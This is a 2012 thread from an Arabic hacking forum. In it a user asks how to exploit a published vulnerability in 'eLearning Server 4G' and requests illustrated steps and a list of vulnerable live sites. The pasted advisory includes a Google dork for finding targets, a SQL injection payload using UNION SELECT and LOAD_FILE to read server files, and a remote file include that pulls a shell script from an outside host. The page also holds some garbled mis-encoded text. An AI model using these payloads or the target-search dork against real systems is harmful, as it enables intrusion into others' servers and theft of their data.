التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

 
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 05-14-2012, 12:25 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية qasim
 

 

 
إحصائية العضو





qasim غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
qasim is on a distinguished road

افتراضي مجاب: كيف استغل هذه الثغره؟ ارجوا المساعده


السلام عليكم ايها الاحبه

لي الشرف ان اكون بينكم وقد تعلمت الكثير في هذه الفتره القصيره من بدايتي

لدي سؤال وارجو من اهل الخبره المساعده

هذا هو الدورك الجديد للثغره الجديده

كيف ممكن استغلها

اريد شرح بالصور واي موقع مصاب بهذه الثغره حتى تعم الفائده للجميع
http://cxsecurity.com/issue/WLB-2012050086


# Exploit Title: eLearning Server Multiple Remote Vulnerabilities
# Google Dork: intitle:"eLearning Server"
# Date: 10.05.2012
# Author: Eugene Salov, Andrey Komarov (Group-IB, http://group-ib.ru)
# Software Link: http://www.hypermethod.ru/
# Version: 4G
# Tested on: Microsoft Windows

news.php4 "nid" SQL injection:
POC:
/news.php4?nid=-12'+union+select+1,2,LOAD_FILE('C:\\Program%20File s\\Hypermethod\\eLearningServer\\index.php'),4,5,6 ,7,8
,9,10,11/*

admin/setup.inc.php Remote file Include
POC: /admin/setup.inc.php?path=http://group-ib.ru/shell.txt?



Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC ;dt hsjyg i`i hgeyvi? hv[,h hglshu]i

   

رد مع اقتباس
أفضل جواب - كتبه mido868
اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة qasim
رحم الله والديك ايها المكرم

بارك الله فيك وفي مسعاك ورحم الله والديك

نورت حبيبى
وهذا رابط القسم المختص http://www.vbspiders.com/vb/f133.html
والله ان هذا الرد عندى من أفضل الردود جزاك الله خيرا على الدعوة ونتمنى ان يرزقنا الله نحن واياكم
 

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:18 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0